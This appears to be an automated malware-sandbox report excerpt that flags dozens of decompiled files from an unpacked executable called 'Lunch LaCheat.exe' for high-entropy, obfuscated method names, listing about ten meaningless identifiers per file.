                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Jb85v1sq6IWCtQ7Vqu.cs | High entropy of concatenated method names: '_0023C', 'IndexOf', '_0023D', 'Insert', '_0023E', 'RemoveAt', '_0023F', 'get_Item', '_0023G', 'set_Item'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, vK3PiltUTHMLVDrDT8n.cs | High entropy of concatenated method names: 'FBr6S3mhmp', 'mvGkoXHmahBtZ5DeyAP', 's3yI1IHlnbYWQ0cDjsW', 'tubhBvHwJMxNiUtCSoD', 'f06gDqHfv0377bFQKfj', 'tXv20oib2p', 'TDc2G9dTCL', 'wwZ2bbYM8P', 'edZ214Srfu', 'q8N29cRarq'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, q8LHkBqBZc0BmxvQWYH.cs | High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'dc2h7s7l2bZ7ac2bgs5', 'XXkXrf7r24Mh4osJaef', 'BJKaqZ7DZBiopasUQXP', 'vOvdmP7NkIm7avuOprL', 'lb9aJS73vL1Cn8CVhEV', 'O9TKQq7t156fMSeGKyv'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, VwsI0eXAjxgDO5eO946.cs | High entropy of concatenated method names: 'PJ1', 'jo3', 'QhACZG1nuJ', 'gnxC2qDR75', 'xgbCBXBdC6', 'EC9', '_74a', '_8pl', '_27D', '_524'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, z8gUbRX871YUO6KvEjH.cs | High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ix9Miew8MmrhPUW6iG7.cs | High entropy of concatenated method names: 'A7EGRZWto2', 'MlUG8wO8sA', 'zjHGhA80h0', 'k1tGOFYPLo', 'H8kGetCy2q', 'cIMGa7LTR1', 'yQLGCpAmy2', 'nkHG0qyIkQ', 'h4SGGYebre', 'lokGbybUQ7'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ctiO1aUb80GXStvVQ3f.cs | High entropy of concatenated method names: 'sFTRYKjJvv', 'YFXRl2LSuZ', 'igKRvQ9RUr', 'aKNRNk5oQf', 'KGWRiMrEoo', 'q2hRL9enh2', 'vNOWsDCZGATwrY8gMq6', 'PJwbB8CdW955LNt4iEj', 'rvCMDxC4DFbmX1a1HI4', 'CaATkkCauyj44NtKGXO'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, nhbQX4wTCE0caeKIHB.cs | High entropy of concatenated method names: 'EQXH4TCE0', 'Yi8356vripC8ilFp0f', 'SSvq0R1MYTyTJUTY0G', 'HWNHdtOUXBWVAWXdIX', 'L0xsrELxFiDu0W9bFR', 'AiWZ4IMeVAmJ4F6jb1', 'OIIfH6Xm7', 'qkJML7FH5', 'wxltexwLw', 'mafUaGdQV'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Yarf2vfPQwRKas0dOld.cs | High entropy of concatenated method names: 'YcBMNnVE0A', 'bFKFfAPQdJqDSLdxsRN', 'Ui04YvPBQas2ifmOoHO', 'FOsO4HPc1PT3R8IgsnS', 'VKZ4elPnV1yPfUV0Mae', 'sBfOimPIjyexNZHuxP8', 'LsGyCqP6Y0Sw1YbN2SJ', 'Ga87hZP7Iypv8oK2YEZ', 'j6PrYqPyXHrUnWoAJsd', 'mwpOhCPqk5ZNWH9xbCN'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, RSx3mxln0wS0orPm0E.cs | High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'l2h1jXIjN1EHXRcdH8S', 'o2Ni80IFl7jUaGDcfSK', 'AVxZQ1IbsIs8ixlkEH7', 'rvguNmI1uOZvsnpN8hn', 'yiOQn9IOE4VjSvBjfxx', 'TZRaJjIvBLBitp2ap4b'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Au6u9NXX2BPw1dlx1cN.cs | High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Thw6BMqwvwHF16riBkP.cs | High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'DXXyLe6YjtAoUAlR400', 'IsQInp6JBBf6Bax69i9', 'RrgwEw62ZWLWR5FdqKm', 'nJmgoR68sn0tOY8nH2p', 'YDje1g6GePELr76Akld', 'UkWNYr6z9qJd2t0UiHX'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, OKOFf3AyEOTeQ8sF02.cs | High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'HHARG2BfYWdYMpdL3vl', 'yqnvCRBmK9is93gbZw5', 'RAdw8XBlerWmPNMHejV', 'tBcVD7BrGUwGmKKlW1U', 'V53aXFBDCHnwZbTRin8', 'fjI1qBBN3EMlGrTwMVj'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, iWMFUTm5Qgip1Z9i3E.cs | High entropy of concatenated method names: 'f1HRteHcI', 'KLh84nVgP', 'wkfh2Pa3I', 'Tp5OiNLJJ', 'tybeBsmlv', 'FegawM7Yt', 'Ku0CqOYbu', 'PKpGNPcyg7aCyWqRSYn', 'pV5Pahcqqo1MKYaLtGX', 'RpdF43c9ENdB4rxPv91'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, suwuZqqUaCC4bv2jsNt.cs | High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'sAHwBF6dCOL3BN4shTu', 'dLDqJK64nHlexilVgsx', 'yJLm8S6Za6VXOQa402f', 'aIAlpp6ade7u8qbGyOX', 'PSKl916S7BgsIc6XHEM', 'KOA13J6sJdCf3N482rU'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bUKS09MsXqrMAhvIgjN.cs | High entropy of concatenated method names: 'LVkZ7ydJL1', 'RXHZgcq7kE', 'spJZSRmYhS', 'nYPaFINUATgOmD2wdj3', 'avDaptNhqOKZG3eGdIL', 'OR93XGNT6Xj1A8YDkQk', 'KmXl6UNecbQwCXrqvXN', 'yJ6ZXvuweT', 'CvGZw7UVGr', 'JyaZJQgawe'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, r1Nd7VMgjpfgH8UhQxo.cs | High entropy of concatenated method names: 'CQFJxOA333', 'GPlJFtAkWb', 'twOJQmTxvP', 'zFOKUnDdD04qbhNC0yh', 'WHPR53D4h4jXhm4myGP', 'RDpdGxDZmn1Zwm7je4L', 'AtyTDdDavXYI4CjUynr', 'rsElwBDSV37y8BAOoeX', 'nYNKVTDsrCsQdvXY4Ar', 'MwpeOGDVh3NZsXZT7X7'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Fioc1Eq5kI2Wt8Yw2K3.cs | High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'pe8Y567gq5BdfHvRsHG', 'fycxlI7jSB8cgfDGNOp', 'jCO1mL7FZccHMJ3VyCm', 'kIkAFj7bdSYdMSAh8Np', 'kar2iO71X55aoCpyS4x', 'enfFTM7OVdnv3amTJ84'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, dVUBQucrV6vLHbsrlB.cs | High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'Sx2g3IQEkNSyapVAdBm', 'ptGwXiQCWH9aZxJjeOS', 'R6XEt4Qpghm4myNgS0A', 'EnaSu1Qo508gWs5LXdV', 'oZdGeGQuOnEbNesrKRw', 'nDI3xxQhPTyyaEyjr35'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bWvKHFeX1fCoZwKOW0.cs | High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'D4idk5n0rHxOIMbXBpD', 'j99aY5nAJp7JVUikfi0', 'kjbyW8nROFsLNZpHQJ6', 'jTMKvkniuyvkpf3VChZ', 'YZHjornPXX4SAkLd81W', 'slmX5gnXcGpNtg8Lc7I'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, gKJnY3fffZyAJh7UTXY.cs | High entropy of concatenated method names: 'RUNfjSb3Gb', 'qYlfxlZg75', 'SwJfFiM21b', 'z65fQeKRl3', 'jvXfYxaNYC', 'NTOflNCx0T', 'JFajgeRfh54h82epLwk', 'IXH5CyRmGleZOV1rM2I', 'Q73ZJmRWIuIR6u6KGDB', 'Od9WKuRwpETgG1aBejd'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, v1H9NwqEOJDUB1tm5YX.cs | High entropy of concatenated method names: 'NKxfBJ9gEb', 'z1Tf6PI5PK', 'WyaLBQ0AmR8piRUljVY', 'xAvxBW09gEq0CG7AUy3', 'JgGt2K00mDjaXfxpECQ', 'CYkRpL0RaLhodWbkQKH', 'HnjsTg0i36s9WZlKYfM', 'L03M900P13ChX4MvafH', 'TIpof00XSGngI1vTvvj', 'SF0ZoB0WgDTwMsMjVcH'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Fnr6ywMQNBPcTXUFQeh.cs | High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'IT02B0NaA8', 'Qjt5q4hF13', 'Cyo2606ER3', 'vko5IrU3jc', 'sDiMNXtp85QCCZP79fg', 'rsYW6lto7dgftD01ift', 'r0Su44tE2uY5h1WWjtd'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wqRwrbX1J1I0lijql3J.cs | High entropy of concatenated method names: 'qyJ5TjUBrcELHDypRVR', 'okjImSUIpVSNypJkCGa', 'LULUEqUnkXXGocgk3ky', 'mRBREgUQCPKKyohB9iq', 'qjpO9d8jf1', 'WM4', '_499', 'lYROp9AR7q', 'xQjOdZft1Z', 'TfaOc8KN6Z'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, SnxHSTqDkQ0SnKZtlax.cs | High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 's6IhVny5iCelJ8n2iZ5', 'bMhYt5yciBLIP5L6eew', 'CX02B3ynMkPf0nmVUtp', 'oMPJH7yQv8t8cvAnt4I', 'NXqCtlyB1LE0DFyDUv4', 'EsokVRyI9Xb9FF5MMqS'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zmTxvPtB3JXpW99rT2g.cs | High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, nKFhZaGINSnlIuOGr6.cs | High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'oU4K1Tb85', 'Dj5REmnlY70lckCAcCY', 'qqChvVnrHb4tv0pesFG', 'hJsE6fnDqDqZAxYKs03', 'eCPPmMnNVMOi2NJ8FYU', 'lIaM53n3hgmj0mlweVl'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, MZcSW5XFnMZt2tTbkg5.cs | High entropy of concatenated method names: 'Aj5CmemkBa', '_1kO', '_9v4', '_294', 'qpbCu8eZ1t', 'euj', 'MOiCRpBV8q', 'AeaC8rGIAN', 'o87', 'lb1Cho7prW'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, WWqZNXK75NEoPq9OON.cs | High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'QNjyldQJYfb7F6L0bLM', 'ssMcBqQ2AgGWB1IgPnB', 'o2aqMYQ8P280noQTDmF', 'GSCGFYQGOiA1roIXyaY', 'PI3mSKQz1S28VLSo76D', 'dKVWDhB5Pf6DTg4wcVp'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mVPDZufZM2W7mkK879j.cs | High entropy of concatenated method names: 'J2UMbVjRB6', 'wLOM18f94l', 'bRDM9RQIua', 'FCCMpiX6Rh', 'zCuMdgCvtb', 'VVjMcclkjW', 'cmGMTsVGNs', 'WvRvtyixcFHmYmeLPBl', 'vecaksi3AcyP4Q2SSkc', 'B21HkIitdPNVhIQbKia'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, jnVE0AqQ75AvvmYSO4D.cs | High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'NEOdEQ0O8F4GBDd9q3v', 'ANwRux0vVtbqoP3mbIo', 'bf7KUY0LWWhMWRwFqNq', 'dTeDGm0MtXA15BKAT4q', 'MBV3610Ee14N1BUI0C4', 'IauNtu0CQvuFhNmEbxV'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, GXbGVUq9ec7tQ7QY4FA.cs | High entropy of concatenated method names: 'CorqlPm0EZ', 'dbCT6b9xt4SIjwGcTpo', 'Cc23qw9Hqw51fELBEUP', 'YqP1vO93KQCXtLglce7', 'qKypAP9tH44l4i9GFWP', 'Ut14gR9kUUP4DYoGUC0', 'QLw', 'YZ8', 'cC5', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, S4xuYYf4VvkDUfoJrma.cs | High entropy of concatenated method names: 'KmItHy8RCX', 'hfvtP2Yevb', 'fKgfm6XxBJm57GNKGjt', 'gkZKx3XHYrOWnbe0sTQ', 'vhEvxIX37eiiOpQw5vM', 'cdE2eEXtTCVwNauLgZc', 'JCtPOqXku8GaQnNosNH', 'erP1AoXgwSSZCm0IOnB', 'S1qVpaXj6TCm7j3DOi9', 'oFfOsFXFEYwfmI07iEk'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, spviIXXITu8HiQLRydd.cs | High entropy of concatenated method names: 'K20h4TKijO', 'P5uhVdQO1L', 'pn4hIRSyqM', 'ERehmlw0LM', 'wtphusGQWs', 'cLQyeou26FrYqdVs4PA', 'kwTChXu8ZTKPtB0WkkT', 'zkRfCquGBv3XTY00Tcp', 'yqmxEJuznAIeCmuCpIQ', 'jVq0sjh5xhViu2lD1ig'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bjx4PUMNvrbRTipVjsL.cs | High entropy of concatenated method names: 'bSGuPSxCqQx8COVogUR', 'IZdvcXxpbntIBs2jPE1', 'wde6TExMAm1KLhlWrIY', 'IqpQkRxEW58S5H1aEn6', 'IWF', 'j72', 'hdI2ScsE9M', 'FTh2DLjhNr', 'j4z', 'APh23kPe0K'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, DNSXGhMxb8hbaZ3ZyOl.cs | High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'bHN5MRYiSF', '_168', 'YE1x18tHjJndhXtjI9G', 'Es2Tc8tk1D98Hs9mLfo', 'mjdPxOtgNK89UKGrREt', 'MqejK6tjvtqcoqfFc80', 'rUdYc2tFBN5Bu275YvO'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mGRo5IqgkpbCevtLJw4.cs | High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'HlnkvJ7VPsCs6ZsASYh', 'YaUZWc7KWWp7fikmkBL', 'mFT2oW7Y3Kmq8Aaa870', 'T044587JtvcIy7SB7hw', 'PEtD9772RffA43EytyE', 'nCuIXI781myahKHrcWj'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, n5BLl0zub6q1E6cKtB.cs | High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Tr9Fr96QgZuIYdCN7KJ', 'h0hgxw6BnAWv6j2DTTg', 'hrl1Np6I3KlBF7Fw5PU', 'CxNYl1662OsmSNJRpj2', 'KwCnSn67Df9xTZgkGCj', 'bhXF276yG03fALrguhy'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, d1Ms4CUYfOkEyT4rV8O.cs | High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zyKIFSUOvZVd5nfJLNC.cs | High entropy of concatenated method names: 'qmhRTovydL', 'MDgRKRD95d', 'oPLRrjc0QR', 'I4ZRnSZmWU', 'EflRWEh8pQ', 'BShREYCj3FSd17ynq3w', 'M1aqNuCkx4yqBE7nkZQ', 'XhX3gfCgCHt5HO7OYOE', 'wlZqSiCFub9p6BpSV8G', 'kk00a4CbebRhf5yS9E1'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wiSwb7XyiTFNRrZRITR.cs | High entropy of concatenated method names: 'P7f8owehxD', 'oer8EZtJhj', 'UaU8jJEEsk', 'b3M8xOxYte', 'XYR8FBIV12', 'CCe8Qhns0d', '_838', 'vVb', 'g24', '_9oL'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, LyW9xXtR93TyJkM7URN.cs | High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'wqRHywrbJ1', '_3il', 'u0lHqijql3', 'gNKHfvtbRv', '_78N', 'z3K'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, JLb518Xu0gr7VgNrdQG.cs | High entropy of concatenated method names: 'IGD', 'CV5', 'yo0hR4v39K', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zWT2AgqN8s5bxJgQo4x.cs | High entropy of concatenated method names: 'LU4fsRYhw6', 'koYq7XA6VkFOldRJlt5', 'ccRkdYA7c8aLwhFmU7A', 's94O9bABd6YMGKmZJR3', 'spfTZbAIiNkRdF5jqg4', 'kwVPm9AysBEtBOyjXnq', '_5q7', 'YZ8', '_6kf', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Sb38j9M5TwPKU5E3N8P.cs | High entropy of concatenated method names: '_223', 'ObchL9DfKqx2y8KPI5B', 'zjyL8gDmB4BA5tX7Sfy', 'AwD8o0Dl8nau0GJDmZc', 'KcrNg3DrrGXhKKACSCj', 'doGS2gDDLcw7qKJHgUc', 'BGYtIMDNCUM0F2OihNl', 'KNcso5D3h3X9yXtwoPg', 'EWsr58DtvoPG6EmKuHn', 'hUx1kPDxpqXCnZMBpOj'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, hYxb1wtLnXrN0rRtimV.cs | High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, I9vhRHquCQ0uLDtMftj.cs | High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'm6JOx8yMVT2AMFy8MY0', 'iN5JtyyE8TQ2EHIq3IW', 'abuNRQyCZQ2s77Z74kO', 'UocsYxypvl32uvLQbW3', 'nU3W9ryo2MCKBXibePA', 'Pj5imPyuBcytTng08QB'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ckfw2rtlq8EL44wGQV0.cs | High entropy of concatenated method names: 'rsKPLncwwW', 'L6sP9D7GLP', 'MY3PpHxxvt', 'DxqPdKmpmu', 'BmxPcxeGN8', 'KNWPTCeMTY', 'UR2PKMeayj', 'EiKPrlj1Li', 'yVFPnZuxop', 'BO6PW9RhMe'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, diijDZfkEAwvm72umcW.cs | High entropy of concatenated method names: 'CsNw8U53TQ', 'lJPbMhmS8Ct7f7ZO0ZG', 'yD6n0FmZlZeDciG0APA', 'OeK0bpmaqdd0OZNZgDw', 'oVKeupms4HPDKNBNLGA', 'Sbvr4MmVIw5cXP5kZdL', 'mmFw3GkEYg', 'sEAwshq5Hq', 'Db9w47p6oR', 'waSwV8Ztq9'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, w22xDBMq7bbo3Ga2veg.cs | High entropy of concatenated method names: 'a1vwCr4fti', 'H9mw0we9aC', 'H0awGgssIu', 'yMIwbRkDE9', 'WYHFxumzDsJZ9jDMjSS', 'jEYH21m8eJJ0NNVD1em', 'Yvp70SmGvJRg5At98tT', 'wyuwNBl5bUYGD9NeyHR', 'DttIPmlcBQFUZdNx5p9', 'U98xMblnDjicSGj2F1B'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, whZPVLpQKsuh7sYp2i.cs | High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'usrtRen8XF05jgBeSKi', 'iA6vWdnGYWrQkMlHeC4', 'l7OCiwnzMUcQmb87Osk', 'nC8VUBQ5xMr7HXTLLeK', 'uhMiPYQcaVJ4N9J6BUD', 'xMoQmfQnNypsK1NrACC'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, U9iiGtqq03BTIAdKv3Z.cs | High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'MWp64P6l3ipq2GQuntq', 'NKk4Cp6rF0ol1VXhsFw', 'qMa3Jf6DVGAjhyhE3Gk', 'CQ7w8K6NJoBOIue0qoV', 'W5ZNGH63RabL7XgnpOX', 'ciHJmY6t1kLtuVC1IHH'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, a8RCXJfyfv2YevbKcJy.cs | High entropy of concatenated method names: 'B1if86EUeO', 'S19fhnlUDc', 'q8LfOHkBZc', 'i8PI4bAvDM9b9C1Xgh1', 'Cjs6HFALJ6AotLk64Gn', 'k7tPmVAMa10WT9riQZC', 'RK6pTsAE4SL2ivvxpdm', 'A6du3SACOq2v6xgKLiP', 'Jh5fROApOWD9HUyQRqh', 'VakGRmA1KCKrxMSk1r5'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, HhoQgiQALbTCJrMygA.cs | High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'QiiUNSIXBAa3MTvUOCu', 'FMZ4lwIWh3SWU7SMwhc', 'Dvab0iIwYdJln3b6nk9', 'QBsabpIfvHk0tYu8ngM', 'CGH9NqImjKdoJaB95FM', 'MjsYO4Ilq6RGO1ZSVb9'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, COtroIUMm4eTIhOVxcs.cs | High entropy of concatenated method names: 'TuZJLpv3X3ZUXuQfMa8', 'DF0hVAvt5o5TjW3LAAV', 'CbpBQ2vDPJtbSFjQn9Q', 'K06NIQvNmxcx4okoToY', 'pU54RJwarE', 'qNaD9IvkyZLLLSYXZ2n', 'VaPEBQvglhuPkTng7gV', 'IN55Q0vxkE4ufGioIQp', 'oqy7ePvHEFuZLvApOym', 'CwS4T7vjvRGJ6EdnGY3'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, vf0yC3MIHlCBxsJ9ID0.cs | High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'tpM09X3i2kDDKar9Dx1', 'Jf8Z0S3PleVt01dPpCm', 's3WKbg3X3ht23eatxyW', 'zs5Vnd3WtIuHS3SNqll'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, DNaNPDq8ZrMGeZQIvVs.cs | High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'E8lgLoy4DIupouCkFA4', 'qfMJ48yZiBo1MF6E6xD', 'Dnsdi7yadExYH8nmDvK', 'aaZ2GJySG17b0RKM8v6', 'ruelhNys0Mlegy5yhFb', 'EmpKriyV2eww67jAxOj'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, yDct3lUiBGykwYgZyNe.cs | High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'Ywp8uokPlx', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, kNoIPAUkfQUI8omLQgL.cs | High entropy of concatenated method names: 'FBq8eOs3Gj', 'iYk8aS7c0M', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'BhA8CKD54d', '_5f9', 'A6Y'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, JrnQWOUZjgUWBocdi9j.cs | High entropy of concatenated method names: 'MBRR4bRWZh', 'dljRVGDLuG', 'beok0xEKNU8oE97cVXm', 'gdJirtEYGwQsYO7TH7X', 'G79xv5EJNEIAhGT5SiY', 'QoDxrPE2nhOSeIhOmfP', 'K3u9F7E8gfcuJwL8ZKH', 'XY1BBlEGogCG7BLkJjZ', 'IWvHJ4EzyO62oyRATuK', 'ooaaDoC5R7I1otPmy6D'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bakGY7MAQ9F1Mugfu6e.cs | High entropy of concatenated method names: '_5u9', 'spk5eP4tNn', 'TM82y63WOc', 'xlo5n38cPv', 'ijDmsq32Cuo0nkm71h4', 'pmmlbH38FgC7IgeCmJx', 'NW4GNa3GCqSCis5YyYb', 'mWl4Li3YuWPoZcZMbjd', 'km51sx3JGusXZGV2HKS', 'qjQnvL3zVIiVitrQV2c'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, xDRQIuqra1CCiX6RhhC.cs | High entropy of concatenated method names: 'WoGfqhwXAd', 'YrnffWIkRQ', 'r7XfMuFUTP', 'PYTUgp9slmjF66T3pwk', 'Ia5Xxi9Vf27RNkwaMvK', 'WrE7er9aBcWYBHcsRZ6', 'TaeQa99STGLKXrARlj9', 'aPsyRx9KgUfkIPH8rdh', 'KFxKGc9YHNCliTOGYpD', 'QgrFic9JXw9Kxa2Ttx1'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, nfeO3JM26UEN4nRJB4s.cs | High entropy of concatenated method names: 'ryxJ1InLAp', 'RHUJ9E29Lj', 'oSNJpITRLy', 'G2fDwUDPjNV9ZqkedFq', 'syRVjODRUQgkNx8k4KP', 'MG67KADi32EoMii2f3c', 'sT2QmfDXYPr5JaU64AZ', 'QOpJ7GmX6g', 'QfIJgjDLxw', 'acyJSkOeR2'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, u7wHE5XO1AwJPYHADRh.cs | High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wvbMxJXf3x1mW0ua4by.cs | High entropy of concatenated method names: 'vqbhJIrxhk', 'XIphZm7Lvs', '_8r1', 'ld4h2Y3rX2', 'Rw8hBdLFuK', 'D4Vh6BjHGm', 'ctAh5E2Uxm', 'sglmWPuWU0lZAiHDmmf', 'ORxqW4uwxm5BQ07tA5t', 'w4VfNvufi4GME3bSXCO'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, AjATmTqxd3qnyspZ8M5.cs | High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'HRIIYd0DFlTC15rYUVP', 'mfIPn10NrKEZSHpfdli', 'PNnWnR03P9hG97s8Bl3', 'jSP2Cd0tWTrMIgKLQvC', 'HqKcYM0x20fOVq54Itl', 'RtP49V0H5kTojw65eOq'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, tuX3ojf34ChaxjRV6c1.cs | High entropy of concatenated method names: 'ghyMzmrMjj', 'GmityahLUc', 'XnGtqsvKl7', 'CwUtfEAeQC', 'gjXtMu01OW', 'J2Attg8s5b', 'QJgtUQo4xj', 'q40tXDejK9', 't9HtwGj4xZ', 'oEntJkXhwB'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, dTG2gXqPUXjsYC5a9HK.cs | High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'gfA0Ju7oAp3APN5QL3C', 'eZuBA77ufnak5Wpyrgk', 'Dw99V67ha1rIRYe4Vq3', 'Hntrf37TKJpcDOdMdxc', 'jTckxA7UpNRoPA5bZOJ', 'XRP1sP7eydMZwiP1WHa'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, sHZJEsfKSVh1hmkvGfT.cs | High entropy of concatenated method names: 'zu5XJPnKAU', 'zwnXZTO1PP', 'doVHscfY2QU7y7n3M6h', 'DHJBGlfJchy0NpVeDY1', 'LdV8eMfVkHTJJlF33VL', 'bBU0WFfKxvYr9Xmxf1T', 'WijXSDZEAw', 'MrPWHnm50A7nn7X0Nbk', 'YvnqISmcdn5vSrLYj2i', 'LMfGohfGAKwhojfkFgx'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, COhgSqfcQyyy2PSOJQt.cs | High entropy of concatenated method names: '_0023Nn', 'Dispose', 'VSZU9M3hJ2', 'C35Upi0Ohg', 'pqQUdyyy2P', 'pOJUcQtL6R', 'CIsUTckToo', 'YXanqqfqhHSyA5ZR5IF', 'tOWOCQf9atQ2ptEERAZ', 'qlcaEGf7oTCAAyOB3oA'
